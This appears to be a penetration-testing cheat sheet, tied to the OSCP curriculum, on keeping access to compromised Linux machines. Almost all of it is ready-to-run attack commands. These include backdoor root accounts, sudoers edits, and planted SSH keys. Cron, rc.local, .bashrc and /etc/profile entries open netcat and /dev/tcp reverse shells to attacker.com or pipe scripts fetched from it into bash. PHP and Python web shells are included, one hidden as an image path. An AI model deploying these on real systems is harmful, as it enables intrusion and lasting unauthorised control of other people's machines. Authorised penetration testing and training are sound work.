Persistence

This document outlines basic methods to maintain access to Linux systems during penetration testing engagements, focusing on techniques covered in the OSCP curriculum.

Table of Contents

User Account Manipulation

Creating New Users

# Add new user with root privileges
useradd -m -s /bin/bash backdooruser
usermod -aG sudo backdooruser
passwd backdooruser

# Add user to sudo group on Debian/Ubuntu systems
adduser backdooruser sudo

# Add user to wheel group on CentOS/RHEL systems
usermod -aG wheel backdooruser

Modifying Existing Users

# Change user shell
usermod -s /bin/bash user

# Add user to sudoers
usermod -aG sudo user
echo "user ALL=(ALL:ALL) ALL" >> /etc/sudoers.d/user

# Modify user password
echo 'user:password' | chpasswd
passwd user

SSH Backdoors

Authorized Keys

# Add SSH key to authorized_keys
mkdir -p /home/user/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EA..." >> /home/user/.ssh/authorized_keys
chmod 700 /home/user/.ssh
chmod 600 /home/user/.ssh/authorized_keys
chown -R user:user /home/user/.ssh

# Add SSH key to root user
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EA..." >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

SSH Configuration Changes

# Add secondary port for SSH
echo "Port 22" >> /etc/ssh/sshd_config
echo "Port 2222" >> /etc/ssh/sshd_config
systemctl restart sshd

Cron Jobs

Persistent Cron Jobs

# System-wide cron job
echo "* * * * * root nc -e /bin/bash attacker.com 4444" >> /etc/crontab

# User cron job
(crontab -l 2>/dev/null; echo "* * * * * nc -e /bin/bash attacker.com 4444") | crontab -

# Add to cron.d directory
echo "* * * * * root nc -e /bin/bash attacker.com 4444" > /etc/cron.d/system-update

Less Obvious Cron Jobs

# Using wget to fetch and execute a script
echo "*/5 * * * * root wget -q -O- http://attacker.com/script.sh | bash" >> /etc/crontab

# Using curl to fetch and execute a script
echo "*/10 * * * * root curl -s http://attacker.com/script.sh | bash" >> /etc/crontab

Startup Scripts

RC Scripts

# Add to rc.local
echo "#!/bin/bash" > /etc/rc.local
echo "nc -e /bin/bash attacker.com 4444 &" >> /etc/rc.local
echo "exit 0" >> /etc/rc.local
chmod +x /etc/rc.local

Bash Profile

# Add to .bashrc for user persistence
echo "nohup nc -e /bin/bash attacker.com 4444 &" >> ~/.bashrc

# Add to global profile
echo "nohup nc -e /bin/bash attacker.com 4444 &" >> /etc/profile

Web Shells

PHP Web Shell

// Simple PHP web shell (shell.php)
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
# Deploy to common web directories
cp shell.php /var/www/html/images/logo.php
# Access via: http://target/images/logo.php?cmd=id

Simple Netcat Reverse Shell from Web

// Simple reverse shell in PHP
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'");
?>

Python Web Shell

# Simple Python web shell (for CGI-enabled servers)
#!/usr/bin/python
import cgi
import subprocess

print("Content-Type: text/html\n")
form = cgi.FieldStorage()
cmd = form.getvalue('cmd')
if cmd:
    output = subprocess.check_output(cmd, shell=True)
    print("<pre>")
    print(output)
    print("</pre>")
else:
    print("<form method='POST'>")
    print("<input type='text' name='cmd'>")
    print("<input type='submit' value='Execute'>")
    print("</form>")

Additional Resources

PreviousCapabilities AbuseNextSecurity Bypass

Last updated